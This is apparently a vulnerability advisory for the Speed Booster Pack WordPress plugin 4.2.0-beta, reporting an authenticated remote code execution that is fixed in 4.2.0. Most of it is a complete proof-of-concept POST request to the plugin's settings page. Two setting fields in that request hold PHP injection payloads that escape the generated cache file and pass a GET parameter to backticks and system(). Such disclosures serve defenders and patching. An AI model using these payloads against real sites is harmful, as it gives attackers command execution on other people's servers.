Speed Booster Pack 4.2.0-beta - Authenticated (admin+) RCE
Description
The plugin did not validate its caching_exclude_urls and caching_include_query_strings settings before outputting them in a PHP file, which could lead to RCE
Proof of Concept
PoC | Authenticated RCE | Caching > Exclude URLs / Cached query strings: POST /wp-admin/admin.php?page=sbp-settings HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: multipart/form-data; boundary=---------------------------302485341940537720723165689794 Content-Length: 12229 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="csf_transient[section]" 2 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="csf_options_noncesbp_options" 29dd57f6e3 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="_wp_http_referer" /wp-admin/admin.php?page=sbp-settings -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[module_caching]" 1 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[caching_expiry]" 1 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[caching_separate_mobile]" 0 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[caching_warmup_after_clear]" 1 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[caching_exclude_urls]" ' );}`$_GET[m0ze]`;/* -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[caching_exclude_cookies]" m0ze -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[caching_include_query_strings]" ' );}system($_GET[m0ze]);/* -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[cdn_url]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[cdn_includes]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[cdn_excludes]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[cloudflare_enable]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[cloudflare_api]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[cloudflare_email]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[cloudflare_zone]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[cf_rocket_loader_enable]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[cf_dev_mode_enable]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[cf_css_minify_enable]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[cf_html_minify_enable]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[cf_js_minify_enable]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[cf_apo_enable]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[cf_apo_device_type]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[cf_browser_cache_ttl]" 0 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[sucuri_enable]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[sucuri_api]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[sucuri_secret]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[module_css]" 0 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[enable_criticalcss]" 1 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[criticalcss_default]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[criticalcss_codes][is_front_page]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[criticalcss_codes][is_home]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[criticalcss_codes][is_single]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[criticalcss_codes][is_page]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[criticalcss_codes][is_category]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[criticalcss_codes][is_tag]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[criticalcss_codes][is_archive]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[remove_criticalcss]" 1 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[css_inline]" 1 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[css_minify]" 1 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[css_exclude]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[module_assets]" 0 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[minify_html]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[optimize_gfonts]" 0 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[lazyload]" 1 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[lazyload_exclude]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[js_optimize]" off -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[js_exclude]" js/jquery/jquery.js js/jquery/jquery.min.js -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[js_include]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[move_to_footer]" 1 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[move_to_footer_exclude]" js/jquery/jquery.js js/jquery/jquery.min.js -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[preboost][preboost_enable]" 1 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[preboost][preboost_include]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[module_special]" 0 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[localize_tracking_scripts]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="___sbp_options[custom_codes][0][custom_codes_item]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="___sbp_options[custom_codes][0][custom_codes_place]" footer -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="___sbp_options[custom_codes][0][custom_codes_method]" normal -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[jetpack_dequeue_devicepx]" 0 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[woocommerce_disable_cart_fragments]" 0 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[woocommerce_optimize_nonwc_pages]" 0 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[woocommerce_disable_password_meter]" 0 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[pagespeed_tricker]" 1 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[module_tweaks]" 0 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[instant_page]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[trim_query_strings]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[disable_self_pingbacks]" 1 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[dequeue_emoji_scripts]" 1 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[disable_post_embeds]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[dequeue_dashicons]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[dequeue_block_library]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[heartbeat_settings]" enabled -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[post_revisions]" 99 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[autosave_interval]" 1 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[dequeue_comment_reply_script]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[declutter_head][declutter_shortlinks]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[declutter_head][declutter_adjacent_posts_links]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[declutter_head][declutter_wlw]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[declutter_head][declutter_rsd]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[declutter_head][declutter_rest_api_links]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[declutter_head][declutter_feed_links]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[declutter_head][declutter_wp_version]" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="csf_import_data" -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="sbp_options[enable_external_notices]" 0 -----------------------------302485341940537720723165689794 Content-Disposition: form-data; name="csf_transient[save]" Saving... -----------------------------302485341940537720723165689794--
Affects Plugins
Fixed in version 4.2.0✓
Classification
Miscellaneous
Original Researcher
m0ze
Submitter
m0ze
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-07-05 (about 6 months ago)
Added
2021-07-05 (about 6 months ago)
Last Updated
2021-08-10 (about 5 months ago)